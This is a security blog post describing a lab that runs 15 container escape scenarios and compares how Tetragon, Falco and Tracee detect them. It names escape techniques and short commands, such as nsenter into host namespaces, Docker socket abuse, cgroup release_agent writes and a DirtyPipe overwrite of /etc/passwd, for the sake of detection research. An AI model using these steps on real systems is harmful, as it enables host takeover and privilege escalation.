CatsCrdl

CatsCrdl

Daniel's thoughts on infosec

Container Escape Telemetry, Part 2: Methodology and Tool Architecture

The lab setup, scenario matrix, and tool comparison framework behind the container escape telemetry research. Three eBPF tools, 15 scenarios, one tool per VM, and a PowerShell harness that ties it all together.

Daniel Wyleczuk-Stern

16-Minute Read

This is Part 2 of the container escape telemetry series (overview). Part 1 covered the isolation primitives and eBPF observability model. This post covers the lab architecture, the three tools under test, the 15 escape scenarios, and the detection coverage matrix. If you want to skip straight to what the telemetry actually looks like, jump to Part 3: Per-Scenario Deep Dives.

The Lab

Each tool ran on its own dedicated Hyper-V VM: 3 GB RAM, 2 vCPUs, Ubuntu 22.04 on kernel 5.15.0-91-generic. One tool per VM. This was non-negotiable. eBPF programs from different tools will contend for the same kernel hooks, and if you’re trying to measure event ordering and timing, that contention corrupts your data. You can’t draw conclusions about “tool A generated event X before tool B generated event Y” if both tools are fighting over the same kprobe attachment points on the same kernel.

You might notice this entire setup runs on Windows with PowerShell and Hyper-V rather than a more typical Linux-native approach. The reason is mundane: my gaming PC has 48 GB of RAM, and computers are way too expensive these days to justify a dedicated lab machine. So Vagrant + Hyper-V it is.

Automation

A PowerShell harness (run.ps1) automated the full workflow per VM: reload the VM to apply kernel parameters, upload scenario scripts via SCP, install the assigned tool, execute all 15 scenarios through a bash harness that records start/end timestamps as JSONL markers, then download results. Those markers are what let me correlate tool events to specific scenario windows with precision. Each scenario runs between a MARKER-S{N}-START and MARKER-S{N}-END container, and every tool captures these container lifecycle events, giving me exact time boundaries to slice the telemetry.

The automation matters for reproducibility. Every run follows the same sequence, with the same sleep intervals, on a freshly reloaded VM. If I need to change a tool’s configuration and re-run, the harness guarantees the same scenario execution order and timing.

Why This Kernel

Kernel 5.15.0-91-generic was chosen deliberately, not by default. Several constraints intersected:

  • cgroup v1 is required for S01 and S02 (cgroup release_agent escapes). The VMs boot with systemd.unified_cgroup_hierarchy=0 to force cgroup v1.
  • CVE-2022-0492 (S02) is patched on this kernel – the unprivileged unshare-to-cgroup exploit path fails with EACCES. That’s intentional: S02 tests the CVE path, observes the failure, then falls back to a privileged release_agent escape. The failed attempt still generates telemetry (the EACCES return), and the fallback still succeeds because the container is privileged and cgroup v1 is available.
  • CVE-2022-0847 DirtyPipe (S08) requires a kernel in the 5.8-5.16.10 range to actually exploit. Kernel 5.15.0-91 is in that window, so S08 produces a real exploit – splice() actually corrupts the page cache and overwrites /etc/passwd. On a patched kernel, you’d still see the syscall pattern but not the actual escape. That real exploit is one of the most compelling data points in the whole series.
  • CVE-2022-0185 (S09) and CVE-2021-22555 (S10) are already patched on this kernel, so those run in PATTERN mode – the syscall sequence fires but the kernel rejects the exploit. That’s fine for telemetry analysis. The tool still sees every syscall; it just doesn’t result in privilege escalation.

A newer 6.x kernel would sacrifice the real DirtyPipe exploit. I strived for true emulation in this project – pattern-only scenarios are useful, but watching splice actually corrupt the page cache and overwrite /etc/passwd produces telemetry you can’t get any other way.

Lab architecture: three isolated VMs, one tool each, driven by a PowerShell harness

The 15 Scenarios

The scenarios break into five categories. Each scenario is a self-contained shell script that creates its own container, runs the technique, checks for success, and cleans up. Result states: ESCAPED (technique worked), PATTERN (syscall sequence fired on a patched kernel), BLOCKED (kernel or runtime prevented the technique), ABUSED (dangerous capabilities exercised without crossing a namespace boundary), or TELEMETRY_TEST (stress test measuring tool reliability).

Misconfiguration-Based Escapes (S01-S05)

These work on any kernel version because they exploit configuration mistakes, not kernel vulnerabilities.

ID Technique Result What Happened
S01 cgroup release_agent ESCAPED Mounted cgroupfs v1, wrote release_agent, triggered host code execution
S02 CVE-2022-0492 + fallback ESCAPED unshare to user/cgroup ns failed (patched), privileged fallback succeeded
S03 nsenter –pid=host ESCAPED nsenter -t 1 -m -u -i -p joined all host namespaces
S04 Docker socket mount ESCAPED Used mounted docker.sock to spawn container with host root filesystem
S05 Host /proc access ESCAPED Read /proc/1/root, core_pattern, mountinfo, environ from privileged container

S01 is the classic. Mount the cgroup filesystem, create a child cgroup, write to notify_on_release and release_agent, trigger it by writing to cgroup.procs. The host kernel executes your payload. S02 tries the same thing through the CVE-2022-0492 path first (unshare into new user + cgroup namespaces), fails because the kernel is patched, then falls back to the privileged container path. S03 is the simplest: nsenter -t 1 -m -u -i -p joins the host’s namespaces directly. S04 mounts the Docker socket and uses it to spawn a new container with the host filesystem. S05 reads sensitive files through the host’s /proc filesystem that a privileged container can access.

All five succeed. All five generate distinct telemetry signatures. The value of having all five is that they exercise different kernel mechanisms (mount, setns, socket_connect, file_open) and produce different event patterns across the three tools.

Baseline Control (S06)

ID Technique Result What Happened
S06 Unprivileged container NO ESCAPE mount and unshare denied, no escape signals

S06 runs a standard unprivileged container that performs normal operations: file reads, process spawning, network lookups. No escape attempt. This is the noise floor. Tetragon generated 1,127 events from its policy hooks, Falco generated 76, Tracee generated 29. Anything a real escape generates needs to be distinguishable from this baseline.

CVE-Based Exploits (S07-S12)

These generate the exploit syscall patterns. Some actually exploit the vulnerability (S08), some fire the pattern on a patched kernel (S09, S10), and some are blocked by the runtime (S11, S12).

ID CVE Result What Happened
S07 CVE-2024-21626 (Leaky Vessels) PATTERN runc 1.1.11 WORKDIR /proc/self/fd/7; fd leak didn’t manifest in this environment
S08 CVE-2022-0847 (DirtyPipe) EXPLOITED Real exploit: splice() overwrote /etc/passwd via page cache corruption
S09 CVE-2022-0185 (fsconfig) PATTERN unshare(CLONE_NEWUSER), fsopen(“ext4”), fsconfig(). Kernel patched.
S10 CVE-2021-22555 (Netfilter) PATTERN unshare(USER|NET), NETLINK_NETFILTER socket, raw socket creation
S11 CVE-2025-31133 (maskedPaths) BLOCKED Symlinks to /proc/sysrq-trigger and core_pattern; writes blocked by read-only /proc
S12 CVE-2019-5736 (runc overwrite) BLOCKED /proc/self/exe write returned ETXTBSY. Patched runc prevented overwrite.

S07 and S12 use a helper script to swap in vulnerable runc versions (1.1.11 and 1.0.0-rc2) for the duration of the scenario, then restore the patched version afterward. S07’s fd leak didn’t manifest in our Docker/containerd version – the leaked file descriptor existed but pointed to a non-exploitable target – so the syscall pattern fires but the escape doesn’t complete. S08 is the standout: a real DirtyPipe exploit that corrupts the page cache via splice() and overwrites /etc/passwd with a root entry. The telemetry difference between “pattern on patched kernel” and “actual exploitation” turns out to matter a lot, and I’ll dig into that in Part 3.

Capability Abuse (S13-S14)

These came from reviewer feedback: “I would have loved if one of your scenarios was taking a privileged container that isn’t a straight break out.” Fair point. Not every dangerous container action crosses a namespace boundary. Sometimes the damage happens entirely within the container’s existing privileges.

ID Technique Result What Happened
S13 --privileged post-exploit ABUSED Mounted host block device, loaded kernel module, read /dev/kmsg, enumerated keyrings, accessed BPF subsystem
S14 Excessive capabilities ABUSED Read /proc/1/environ and /proc/1/maps via CAP_SYS_PTRACE+–pid=host, raw sockets via CAP_NET_RAW, mounts via CAP_SYS_ADMIN

S13 is the “someone ran --privileged because their eBPF tool told them to” scenario. The container gets all capabilities, all devices, no seccomp, no AppArmor. It doesn’t try to escape – it doesn’t need to. It mounts the host’s block device, loads a kernel module, reads the kernel log buffer, enumerates keyrings (which are not namespace-aware, so any container can read the root keyring), and loads an eBPF program. S14 is the subtler case: specific dangerous capabilities (CAP_SYS_PTRACE, CAP_NET_RAW, CAP_SYS_ADMIN) without full --privileged. Teams try to be granular but still over-grant.

The key question these answer: if something has dangerous privileges and isn’t doing a textbook namespace escape, do these tools even notice?

Stress Test (S15)

ID Technique Result What Happened
S15 Syscall flood + concurrent escape TELEMETRY_TEST 7-phase flood measuring ring buffer resilience under adversarial load

S15 answers the question from Part 1: can an attacker actually blind a security tool by flooding syscalls? Seven phases in two groups. Phases 1-3 flood getpid() at 1K, 100K, and 1M calls (unhooked – no tool generates events). Phases 4-5 and 7 flood openat(/dev/null) at 100K, 1M, and 10M calls (hooked – generates real ring buffer pressure). Phase 6 is the critical test: 1M openat flood running concurrently with an nsenter -t 1 -m -u -i -p escape. Can the tool see the escape during the flood?

The results were the most operationally significant finding in the research. I’ll cover them in detail in Part 4.

The Three Tools

Before diving into what each tool captured, it’s worth understanding why they produce such different telemetry from the same kernel events. The differences aren’t random. They flow directly from how each tool is architected.

Tetragon

Tetragon defines custom eBPF kprobes via TracingPolicy CRDs. For this research, I wrote 8 policies covering 31 kernel function hooks. The critical design choice is that filtering happens in the kernel: if an event doesn’t match a TracingPolicy, it never enters the ring buffer. Never reaches userspace. Never consumes buffer space.

Every event carries the full 10-namespace inode set with a host/container boolean, uid/gid/euid/egid/suid/sgid/fsuid/fsgid, complete permitted and effective capability sets (every capability listed by name), and full process ancestry up to the configured depth. A single Tetragon event averages ~14,600 bytes. That’s not bloat – it’s forensic self-sufficiency. Every event can be analyzed in complete isolation without correlating against external context.

The tradeoff is authoring cost. Tetragon ships with zero escape-detection policies. The TracingPolicy CRD system is powerful but empty. You’re writing kprobe YAML from scratch, specifying which kernel functions to hook, which arguments to capture, and which filters to apply. That authoring cost is real. But it means every event you get back is exactly the kernel function call you asked for, with the exact arguments you specified.

Falco

Falco takes the opposite approach to coverage. It ships with 400+ community-maintained rules and its eBPF driver captures syscalls broadly, sending events to userspace where the Falco engine evaluates YAML rule conditions. Only rule-matched events are emitted as output. This means the barrier to getting started is low – install Falco, and you immediately have detection coverage for common container escape patterns.

Events carry container name, image, and ID via the container runtime socket, user info, and process ancestry up to a configurable depth. Each event averages ~3,500 bytes. Falco doesn’t provide raw namespace inodes, which limits certain types of forensic correlation. You know a namespace change happened, but you can’t programmatically prove which specific namespace transitioned by comparing inode values.

One important caveat: Falco’s default ruleset detected only 5 of 13 scoreable scenarios (S01-S14, excluding S06 baseline and S15 stress test). I wrote twelve additional custom rules targeting CVE-specific syscalls and capability abuse patterns, and enabled rule_matching=all so overlapping rules fire on the same event. The gaps were entirely configuration-driven, not engine limitations. I’ll cover this in detail in a later post, because it’s one of the most actionable findings from the research.

Tracee

Tracee sits in an interesting middle ground. It attaches eBPF tracepoints to 330+ syscalls and runs a behavioral signature engine (the TRC-* signatures) on top. This gives it two telemetry layers: raw syscall capture and derived behavioral events. Each event averages ~1,400 bytes – the most compact of the three tools.

Its standout capabilities are magic_write and commit_creds. magic_write fires when file content changes through a mechanism that bypasses normal write permissions – which is exactly what page cache corruption does. commit_creds captures the actual kernel credential struct transition, showing old and new uid/gid/capability sets. These are synthesized observations, not raw syscalls. They detect exploit consequences rather than specific syscall sequences, which makes them more resilient to exploit variations. If the next kernel CVE uses a completely different syscall chain to corrupt page cache or escalate credentials, magic_write and commit_creds will still fire. A tool that only matches specific syscall patterns won’t.

The tradeoff is that Tracee’s broad hook coverage creates a larger attack surface for ring buffer flooding. With 30 event types in our policy (and 330+ in its default set), an attacker has many possible syscalls to flood. This is manageable with proper policy tuning – particularly path-filtering security_file_open – but it requires understanding which events are high-frequency and scoping them appropriately. I’ll cover the S15 stress test results and what they mean for Tracee deployments in Part 4.

Architecture Comparison

Dimension Tetragon Falco Tracee
Collection method Custom kprobes via TracingPolicy eBPF syscall driver + rule engine eBPF tracepoints + behavioral signatures
Where filtering happens In-kernel BPF Userspace rule engine In-kernel + userspace behavioral
Namespace context Full 10-ns inode set + is_host Container name/image/id, no raw inodes mountNs + pidNs inodes, container metadata
Credential detail Full uid/gid/euid + capability sets user.uid, cap_effective, cap_permitted userId, commit_creds old/new structs
Process ancestry Full tree with binary paths + args proc.aname[N] up to configurable depth hostParentProcessId chain, parentEntityId
Enforcement In-kernel SIGKILL or syscall return override Alert only Alert only
Avg event size ~14,600 bytes ~3,500 bytes ~1,400 bytes
Default detection coverage None (author your own policies) 400+ community rules 330+ syscall hooks + TRC-* behavioral sigs

The “where filtering happens” row is the single most important architectural distinction for understanding the tools’ behavior under load. Tetragon’s in-kernel filtering means irrelevant events never consume buffer space. Falco’s userspace filtering means all syscalls hit the buffer, but the rule engine decides what to emit. Tracee’s model is somewhere between: its eBPF programs do per-event-type filtering in-kernel, but event-type prioritization under buffer pressure is not implemented. That distinction drives the S15 results.

Detection Coverage

The table below shows which tools generated escape-specific telemetry for each scenario. I’m not counting generic process lifecycle events – only signals that actually indicate the escape technique was used. The Falco column reflects the final state after my twelve custom rule additions. S15 is a stress test, not an escape scenario, so it’s scored separately.

Legend: ✓ = detected the escape technique, ✗ = missed, △ = partial detection (tool saw related activity but not the core escape mechanism – counts as detected in scoring since it would trigger investigation).

Scenario Technique Tetragon Falco Tracee
S01 cgroup release_agent ✓ mount + cgroup_mkdir + file_open ✓ release_agent write ✓ mount + magic_write
S02 CVE-2022-0492 + fallback ✓ unshare + mount + task_alloc ✓ release_agent + ns change ✓ switch_task_ns + magic_write
S03 nsenter ✓ setns() x4 with ns type flags ✓ Namespace Change x5 + Nsenter Execution ✓ setns x4 + switch_task_ns x4
S04 Docker socket ✓ socket_connect to docker.sock △ Docker Socket Access (runc init only) ✓ security_socket_connect x5
S05 Host /proc ✓ file_open on /proc/1/root/*, core_pattern ✓ Sensitive Host File Read x3 ✓ security_file_open
S07 Leaky Vessels ✗ No fd-leak hook ✗ No fd-leak rule ✗ No fd-leak signature
S08 DirtyPipe ✓ splice/do_splice with file paths ✓ splice (custom rule) ✓ splice + 961 magic_write
S09 fsconfig ✓ fsopen + fsconfig + cap_capable ✓ fsconfig (custom rule) ✓ unshare + commit_creds
S10 Netfilter ✓ setsockopt + unshare ✓ netlink socket (custom rule) ✓ unshare + commit_creds + setsockopt
S11 maskedPaths ✓ symlink() x2 to /proc targets ✓ symlink (custom rule) ✓ symlink x2
S12 runc overwrite ✓ bprm_check + file_open /proc/self/exe ✗ Write blocked before observation △* openat(/proc/self/exe) ret=ETXTBSY
S13 Privileged post-exploit ✓ mount + keyctl + security_file_open ✓ Keyctl + Kernel Log + Mount + Raw Socket ✓ mount + security_file_open + keyctl + commit_creds
S14 Excessive capabilities ✓ mount + keyctl + security_file_open ✓ Host Environ + Host Maps + Mount + Packet socket ✓ security_file_open + mount + tcpdump exec

*△* for Tracee S12 requires the openat event to be explicitly enabled in the policy; it is not in Tracee’s default event set.

Detection Scores (S01-S14 escape scenarios only; S15 is a stress test; △ counts as detected, △* does not in the base score):

Tool Real-Time Detection
Tetragon 12/13
Tracee 11/13 (12/13 with openat event enabled)
Falco 11/13 (5/13 before custom rules)

What the Scores Don’t Tell You

The aggregate scores are useful for a quick comparison, but they flatten out qualitative differences that matter enormously in practice. A checkmark in the detection column doesn’t tell you:

  • What context the event carries. Tetragon’s setns() events include before/after namespace inode pairs with type flags decoded. Falco’s “Namespace Change” alert tells you it happened but not which namespaces transitioned. Both get a checkmark, but one gives you forensic evidence and the other gives you a detection.

  • Whether the detection required custom work. Falco’s 11/13 includes 6 scenarios that only work because I wrote custom rules (the other 5 use default rules). Tetragon ships with zero escape-detection policies, so all 12 detections required custom TracingPolicies. Tracee’s 11/13 includes behavioral signatures that ship by default. The out-of-box experience is very different.

  • How the tool handles the scenario it missed. All three tools miss S07 (Leaky Vessels). But the reason is the same for all of them: the fd-leak attack doesn’t produce a distinctive syscall pattern that can be hooked. The WORKDIR during docker build just looks like a normal process with an unusual working directory. This is a fundamentally hard detection problem, not a tool limitation.

The S06 baseline is important context for everything that follows. It shows what “normal” telemetry looks like from an unprivileged container where mount and unshare are both denied. Tetragon generated 1,127 events from its policy hooks with zero escape-specific signals. This is the noise floor against which everything else should be compared. If your detection can’t distinguish escape activity from that baseline, it’s not a useful detection.

What Comes Next

With the lab, tools, and coverage matrix established, Part 3 digs into the per-scenario telemetry: what each tool actually captured, what the events look like, and what patterns emerge when you compare the raw data across tools. That’s where the qualitative differences behind the checkmarks become concrete.

If you’re more interested in operational questions – how much data do these tools generate, what does the signal-to-noise look like, and which tool should you actually deploy – skip to Part 4.

The full scenario scripts, Tetragon policies, Falco rules, and automation harness are available in the research repository.

References

CVEs and Vulnerability Research

Tool Documentation

Kernel Documentation

Say Something

Comments

Recent Posts

Categories

About

A random collection of thoughts on cybersecurity.